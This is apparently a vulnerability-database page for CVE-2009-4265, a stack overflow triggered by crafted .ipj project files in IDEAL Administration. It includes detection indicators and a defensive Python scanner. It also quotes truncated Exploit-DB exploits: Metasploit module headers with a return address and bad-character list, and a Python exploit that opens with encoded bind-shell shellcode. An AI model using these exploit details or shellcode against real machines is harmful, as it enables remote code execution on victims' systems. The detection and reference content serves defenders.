CVE-2009-4265
Published 2009-12-10
Priority P3 · 53 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit available
EPSS: 31.39% (percentile 98.1)

Stack-based buffer overflow in Ideal Administration 2009 9.7.1, and possibly other versions, allows remote attackers to execute arbitrary code via a long Computer value in an .ipj project file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pointdev | ideal_administration_2009 | — | — |
Detection & IOCs (extracted from sources)
Byte pattern: 0D 0A 5B 45 6E 64 5D 0D 0A (the ASCII sequence `\r\n[End]\r\n`)
- Malicious .ipj file contains the '[Group,Export,Yes]' header followed by an oversized 'Computer=' value (2420+ bytes), which triggers a stack buffer overflow.
- Bad characters for payload encoding in this exploit are 0x00, 0x0a, 0x1a, 0x22, 0x3c, 0x3e; this is useful for tuning IDS/YARA rules to match encoded shellcode patterns in .ipj files.
- EXITFUNC is set to 'seh' in all exploit variants, indicating SEH-based shellcode execution; monitor for SEH chain overwrites in processes loading ListWmi.dll or ULMigration_us.dll.
- A stack adjustment of -3500 bytes is used in the exploit payload; anomalous large negative stack adjustments in the context of .ipj file parsing may indicate exploitation.
- IDEAL Administration 10.5 is compiled with /SafeSEH, which mitigates the SEH-based exploitation path used by these exploits; detection rules targeting SEH overwrites may not fire on 10.5.
- All versions of IDEAL Administration (v9.7 through v10.5) and IDEAL Migration (4.5 and 4.51) are considered vulnerable; version-based filtering alone is insufficient for detection.
- The exploit is file-format/local in nature: it requires the victim to open a crafted .ipj project file via 'Migrate -> Open Migration Project'; there is no network-based attack vector.
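The indicators above describe a file-level signature: an export section header followed by a `Computer=` value far longer than any real host name, in a file that ends with the `\r\n[End]\r\n` byte sequence. The following scanner is an added example written for this page (it is not part of the Exploit-DB or Metasploit code, nor vendor code). It assumes the .ipj file is a line-oriented `Key=Value` text format with bracketed section headers, as the indicators suggest, and the 256-byte threshold is an assumption chosen to sit well below the 2420-byte figure quoted above while still being larger than any legitimate computer name.

```python
"""Flag .ipj project files carrying an oversized 'Computer=' value (CVE-2009-4265 indicator).

Added detection example, not part of the original exploit or vendor code.
Assumptions: the .ipj file is line-oriented 'Key=Value' text with bracketed
section headers such as '[Group,Export,Yes]' and ends with '\r\n[End]\r\n';
MAX_COMPUTER_LEN is an assumed sane upper bound for a host name.
"""
import sys

SECTION_HEADER = b"[Group,Export,Yes]"
# Byte pattern listed on the page: 0D 0A 5B 45 6E 64 5D 0D 0A == b"\r\n[End]\r\n"
END_MARKER = bytes.fromhex("0D0A5B456E645D0D0A")
MAX_COMPUTER_LEN = 256  # assumed threshold; the exploit uses 2420+ bytes


def find_oversized_values(data, key=b"Computer", limit=MAX_COMPUTER_LEN):
    """Return [(line_number, value_length)] for every 'key=' line whose value exceeds limit.

    Lines are split on '\n' and a trailing '\r' is stripped so CRLF files
    are measured correctly; key comparison is case-insensitive.
    """
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), start=1):
        line = line.rstrip(b"\r")
        if b"=" not in line:
            continue  # section headers and blank lines carry no value
        k, _, v = line.partition(b"=")
        if k.strip().lower() == key.lower() and len(v) > limit:
            findings.append((lineno, len(v)))
    return findings


def scan_ipj(data):
    """Summarise the page's indicators for one file's bytes.

    'suspicious' is only set when the export header and an oversized
    Computer value are both present, so a lone long line in an unrelated
    section does not fire by itself.
    """
    oversized = find_oversized_values(data)
    has_header = SECTION_HEADER in data
    return {
        "has_export_header": has_header,
        "has_end_marker": END_MARKER in data,
        "oversized_computer": oversized,
        "suspicious": has_header and bool(oversized),
    }


# Constructed samples (not real project files): a benign export and one
# shaped like the overflow trigger described on the page.
BENIGN_IPJ = b"[Group,Export,Yes]\r\nComputer=WORKSTATION01\r\n[End]\r\n"
MALICIOUS_IPJ = b"[Group,Export,Yes]\r\nComputer=" + b"A" * 2420 + b"\r\n[End]\r\n"


def scan_paths(paths):
    """Scan files on disk; returns {path: result} so callers can act on it."""
    results = {}
    for path in paths:
        with open(path, "rb") as fh:
            results[path] = scan_ipj(fh.read())
    return results


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, res in scan_paths(sys.argv[1:]).items():
            print(path, "SUSPICIOUS" if res["suspicious"] else "ok", res["oversized_computer"])
    else:
        for name, sample in (("benign", BENIGN_IPJ), ("malicious", MALICIOUS_IPJ)):
            print(name, scan_ipj(sample))
```

Run it with one or more .ipj paths to scan files on disk, or with no arguments to scan the two embedded samples. Because the check keys on value length rather than on a specific shellcode encoding, it is indifferent to the bad-character set and encoder the exploit variants use; it will equally flag a file built for the /SafeSEH 10.5 build, where an SEH-overwrite rule would stay silent.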
No detection rules found.
Exploit-DB: PointDev IDEAL Migration - Buffer Overflow (Metasploit) (exploitdb, 2010-09-25)
---
```ruby
##
# $Id: ideal_migration_ipj.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PointDev IDEAL Migration Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in versions v9.7
        through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
        IDEAL Migration. All versions are suspected to be vulnerable.
        By creating a specially crafted ipj file, an attacker may be able
        to execute arbitrary code.
        NOTE: IDEAL Administr
```
Exploit-DB: PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit) (exploitdb, 2009-12-06)
---
```ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IDEAL Administration 2009 Buffer Overflow - Universal',
      'Description'    => %q{
          This module exploits a stack overflow in IDEAL Administration v9.7.
        By creating a specially crafted ipj file, an attacker may be able
        to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'dookie, original by Dr_IDE' ],
      'Version'        => '$Revision: 7724 $',
      'References'     =>
        [
          [ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00\x3c\x22\x3e\x1a\x0a",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # ListWmi.dll
```
Exploit-DB: PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (exploitdb, 2009-12-05)
---
```python
#!/usr/bin/env python
#################################################################
#
# IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit
# Found By: Dr_IDE
# Usage: Migrate -> Open Migration Project -> Bind Shell
# Download: www.pointdev.com
# Tested On: Windows XPSP3
#
#################################################################

# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
sc = (
    "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x4b\x4c\x42\x4a\x4a\x4b\x5
```
Metasploit: PointDev IDEAL Migration Buffer Overflow
This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
No writeups or analysis indexed.